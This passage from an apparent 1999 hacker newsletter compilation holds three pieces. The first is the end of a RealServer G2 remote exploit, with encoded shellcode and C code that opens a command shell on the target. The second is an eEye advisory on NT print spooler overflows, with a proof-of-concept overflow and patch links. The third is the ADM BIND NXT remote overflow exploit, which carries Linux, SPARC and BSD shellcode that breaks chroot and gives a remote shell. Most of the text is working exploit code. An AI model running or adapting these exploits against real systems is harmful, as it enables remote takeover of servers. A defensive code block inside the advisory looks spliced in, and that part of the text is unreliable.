"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" 
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" 
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf" "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E" "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB" "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR" "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9" "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP" "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF" "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/" "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX" "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68" "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf" "84fyZ/////w==\x0d\x0a\x0d\x0a\x00"; int main (int argc, char **argv) { int socket; char *server; unsigned short int port; struct sockaddr_in sa; if (argc != 3) { printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n" "by dark spyrit , port by team teso\n\n" "usage: %s \n" "eg - %s host.com 6666\n" "the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]); exit (EXIT_FAILURE); } server = argv[1]; port = atoi (argv[2]); socket = net_connect (&sa, server, port, 45); if (socket <= 0) { perror ("net_connect"); exit (EXIT_FAILURE); } write (socket, sploit, strlen (sploit)); sleep (1); close (socket); printf ("data sent. 
try \"telnet %s 6968\" now \n", server);
    exit (EXIT_SUCCESS);
}

unsigned long int
net_resolve (char *host)
{
    long i;
    struct hostent *he;

    i = inet_addr (host);
    if (i == -1) {
        he = gethostbyname (host);
        if (he == NULL) {
            return (0);
        } else {
            return (*(unsigned long *) he->h_addr);
        }
    }
    return (i);
}

int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec)
{
    int n, len, error, flags;
    int fd;
    struct timeval tv;
    fd_set rset, wset;

    /* first allocate a socket */
    cs->sin_family = AF_INET;
    cs->sin_port = htons (port);

    fd = socket (cs->sin_family, SOCK_STREAM, 0);
    if (fd == -1)
        return (-1);

    cs->sin_addr.s_addr = net_resolve (server);
    if (cs->sin_addr.s_addr == 0) {
        close (fd);
        return (-1);
    }

    /* switch to non-blocking so connect() can be bounded by select() */
    flags = fcntl (fd, F_GETFL, 0);
    if (flags == -1) {
        close (fd);
        return (-1);
    }
    n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
    if (n == -1) {
        close (fd);
        return (-1);
    }

    error = 0;

    n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
    if (n < 0) {
        if (errno != EINPROGRESS) {
            close (fd);
            return (-1);
        }
    }
    if (n == 0)
        goto done;

    FD_ZERO(&rset);
    FD_ZERO(&wset);
    FD_SET(fd, &rset);
    FD_SET(fd, &wset);
    tv.tv_sec = sec;
    tv.tv_usec = 0;

    n = select(fd + 1, &rset, &wset, NULL, &tv);
    if (n == 0) {
        close(fd);
        errno = ETIMEDOUT;
        return (-1);
    }
    if (n == -1)
        return (-1);

    if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
        if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
            len = sizeof(error);
            if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                errno = ETIMEDOUT;
                return (-1);
            }
            if (error == 0) {
                goto done;
            } else {
                errno = error;
                return (-1);
            }
        }
    } else
        return (-1);

done:
    /* restore the original (blocking) flags before handing back the fd */
    n = fcntl(fd, F_SETFL, flags);
    if (n == -1)
        return (-1);
    return (fd);
}

@HWA

51.0 NT Print spooler vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Printer (spooler) Service Vulnerabilities

Systems Affected:
Any NT system with a printer or the ability to print to a network printer.
Microsoft Windows NT 4.0 Workstation, Server, Terminal Server (all service packs)

Release Date:
November 4, 1999

Advisory Code:
AD11041999

Description:
It was a typical day in eEye land... the beer was cold, the day was long, the exploit... well, the exploit was a joke started by a client. "The day you guys can hack my network via its printer is the day I call it quits." A joke at first... the ability to remotely and locally compromise an NT network via a printer. What started off as a joke was going to turn into reality. Ten or so minutes after taking a look at the NT printer service we had already found a way to compromise any Windows NT server or workstation that had a printer attached to it or the ability to print to a network printer.

The Windows NT Spooler service (Spoolss.exe), used for various printing activities, contains a number of security holes that allow for data overflows. These vulnerabilities are evident when someone passes data to various spooler service APIs and spoolss.exe does not check the size of the receiving buffer to make sure it can hold the incoming data. The API explained in more detail below can only be exploited locally. However, some of the overflows could be exploited remotely.

Example of one of the exploitable APIs:

First thing to note about the API in question is that it can only be executed if you are a "Power User". So for this example, if you were to write exploit code for this API overflow you could only elevate your access from a Power User to SYSTEM level, which is still a very bad thing. However, as explained earlier, there are other places where the spooler service overflows, and cases that do not require you to be at the Power User level.

----spoolss.c----
#include
#include

int main()
{
    char bigbuffer[3000];
    int i;

    /* a UNC-style "\\" prefix followed by 2000 'A's, far longer than the
       spooler's receiving buffer */
    strcpy(bigbuffer,"\\\\");
    for(i=0;i<2000;i++)
        strcat(bigbuffer,"A");

    AddPrintProcessor(NULL,NULL,bigbuffer,bigbuffer);
    return(0);
}
----spoolss.c----

In this example, the overflow is in AddPrintProcessor.
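As an added illustration that is not eEye's code, the C below models the two facts the advisory turns on: the length check the spooler should make before copying a caller's string into its fixed receiving buffer, and why the return address seen after the overflow is 0x00410041, since every ANSI 'A' byte has been widened to the UTF-16LE unit 0x0041 before it lands on the stack. PROC_NAME_MAX and the function names are assumptions; the real spoolss buffer size is not stated in the advisory.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size (in UTF-16 code units) of the spooler's receiving buffer.
 * The advisory does not give the real figure; this is a placeholder. */
#define PROC_NAME_MAX 260

/* Widen an ANSI string to UTF-16LE, as an "A" entry point does before
 * handing the argument to its "W" implementation: each byte becomes a
 * 16-bit unit with a zero high byte. Returns a malloc'ed buffer holding
 * 2*strlen(s) bytes plus a 2-byte terminator; *out_len is the byte count
 * without the terminator. Caller frees. */
static unsigned char *widen_to_utf16le(const char *s, size_t *out_len)
{
    size_t n = strlen(s);
    unsigned char *w = malloc(2 * (n + 1));
    if (!w)
        return NULL;
    for (size_t i = 0; i < n; i++) {
        w[2 * i] = (unsigned char)s[i]; /* low byte: the ASCII character */
        w[2 * i + 1] = 0x00;            /* high byte: zero */
    }
    w[2 * n] = 0x00;
    w[2 * n + 1] = 0x00;
    *out_len = 2 * n;
    return w;
}

/* Read a little-endian 32-bit value at byte offset off, the way x86 loads
 * a saved return address that widened data has overwritten. */
static uint32_t le32_at(const unsigned char *buf, size_t off)
{
    return (uint32_t)buf[off] | ((uint32_t)buf[off + 1] << 8) |
           ((uint32_t)buf[off + 2] << 16) | ((uint32_t)buf[off + 3] << 24);
}

/* Build the same shape of argument the PoC passes: "\\" followed by
 * count copies of fill. Caller frees. */
static char *make_poc_name(size_t count, char fill)
{
    char *s = malloc(2 + count + 1);
    if (!s)
        return NULL;
    s[0] = '\\';
    s[1] = '\\';
    memset(s + 2, fill, count);
    s[2 + count] = '\0';
    return s;
}

/* The check the advisory says is missing: does the widened name, with its
 * terminator, fit in a receiving buffer of buffer_bytes bytes? */
static int widened_fits(const char *name, size_t buffer_bytes)
{
    size_t need = 2 * (strlen(name) + 1);
    return need <= buffer_bytes;
}

/* Hardened receiver: validate first, copy second. 0 = accepted, -1 = rejected. */
static int checked_add_print_processor(const char *name,
                                       unsigned char *dst, size_t dst_bytes)
{
    size_t wlen;
    unsigned char *w;

    if (!widened_fits(name, dst_bytes))
        return -1;
    w = widen_to_utf16le(name, &wlen);
    if (!w)
        return -1;
    memcpy(dst, w, wlen + 2);
    free(w);
    return 0;
}

/* Convenience wrapper with a buffer of the assumed size. */
static int checked_call_result(const char *name)
{
    unsigned char dst[2 * PROC_NAME_MAX];
    return checked_add_print_processor(name, dst, sizeof dst);
}

/* What a 4-byte slot covered by the widened run of 'A's reads as. */
static uint32_t poc_slot_value(void)
{
    char *name = make_poc_name(2000, 'A');
    size_t wlen;
    unsigned char *w = name ? widen_to_utf16le(name, &wlen) : NULL;
    uint32_t v = w ? le32_at(w, 100) : 0; /* any even offset inside the run */
    free(w);
    free(name);
    return v;
}

int main(void)
{
    char *name = make_poc_name(2000, 'A');
    printf("widened PoC name needs %zu bytes, assumed buffer holds %zu\n",
           2 * (strlen(name) + 1), (size_t)(2 * PROC_NAME_MAX));
    printf("checked call -> %d (0 = accepted, -1 = rejected)\n",
           checked_call_result(name));
    printf("an overwritten return slot would read 0x%08x\n",
           (unsigned)poc_slot_value());
    free(name);
    return 0;
}
```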
When "bigbuffer" is passed to the spooler service, it tries to stuff 2000 instances of the character "A" into a buffer that cannot handle an amount of data that size and therefore overflows. Also you will notice when it overflows that EIP is 00410041. This is because the bytes have been changed into wide byte (Unicode) format. Do not be deceived by this... it is still exploitable. :-]

There exists another vulnerability in the spooler service that allows any local user to load their own DLLs and have them executed by the spooler service with SYSTEM level access, therefore allowing any local user to gain total control of the local machine. The vulnerability is in AddPrintProvidor(). Microsoft has a very good description in their advisory of what a print provider is and why the vulnerability exists, and other detailed information. So instead of regurgitating that information we will give you detailed information on exploiting the hole and an example exploit including source.

http://www.eeye.com/html/Advisories/spoolsploit.zip

A brief word about w00giving:
w00giving is being put on by none other than the security team w00w00. w00giving is a joint effort of various security groups and individuals who are going to be releasing advisories, exploits and tools throughout November and into December. eEye is participating in w00giving, so over the next few weeks of November we plan to release either an advisory or tool once a week. This printer advisory is our first offering and we hope you enjoy it.

Fixes:
X86:
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q243649.exe
Alpha:
http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/ALPHA/EN-US/Q243649.exe
Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly

Related Links:
Retina - The Network Security Scanner
http://www.eEye.com/retina/
Smarter. Faster. Sexier.
w00w00 - w00giving
http://www.datasurge.net/www.w00w00.org/

Greetings: Attrition, w00w00, beavuh, ADM, Rhino9, L0pht, Wiretrip, and HNN.

krystalia 1971-1999

Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer:
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com

@HWA

52.0 Bind remote exploit (ADM)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Note: "We broke this just a little in order to raise the bar on using it (just slightly).. If you'd like to test it on your own box, put a shell in /adm/sh, or /adm/ksh for solaris on the target machine."

/*
 * ADM CONFIDENTIAL -- (ADM Confidential Restricted when
 * combined with the aggregated modules for this product)
 * OBJECT CODE ONLY SOURCE MATERIALS
 * (C) COPYRIGHT ADM Crew. 1999
 * All Rights Reserved
 *
 * This module may not be used, published, distributed or archived without
 * the written permission of the ADM Crew. Please contact your local sales
 * representative.
 *
 * ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez
 *
 * "a misanthropic anthropoid with nothing to say"
 *
 * thanks to stran9er for sdnsofw.c
 *
 * Intel exploitation is pretty straightforward.. should give you a remote
 * shell.
 * The shellcode will break chroot, do a getpeername on all open
 * sockets, and dup to the first one that returns AFINET. It also forks and
 * runs a command in case the fd duping doesn't go well. Solaris/SPARC is a
 * bit more complicated.. we are going through a well trodden part of the
 * code, so we don't get the context switch we need to have it populate the
 * register windows from the stack. However, if you just hammer the service
 * with requests, you will quickly get a context switch at the right time.
 * Thus, the SPARC shellcode currently only breaks chroot, closes current
 * fd's and runs a command.
 * Also, the NetBSD shellcode doesn't break chroot because they stop the
 * dir tricks. Of course, they allow mknods in chrooted environments, so
 * if named is running as root, then it still might be exploitable.
 * The non-exec stack patch version returns into a malloc'ed buffer, whose
 * address can vary quite a lot. Thus, it may not be as reliable as the other
 * versions..
 *
 * We broke this just a little in order to raise the bar on using it
 * (just slightly).. If you'd like to test it on your own box, put a shell
 * in /adm/sh, or /adm/ksh for solaris on the target machine.
*/ #include #include #include #include #include #include #include #include #include #include #include #include #include char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x61,0x64,0x6d,0x2f, 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 
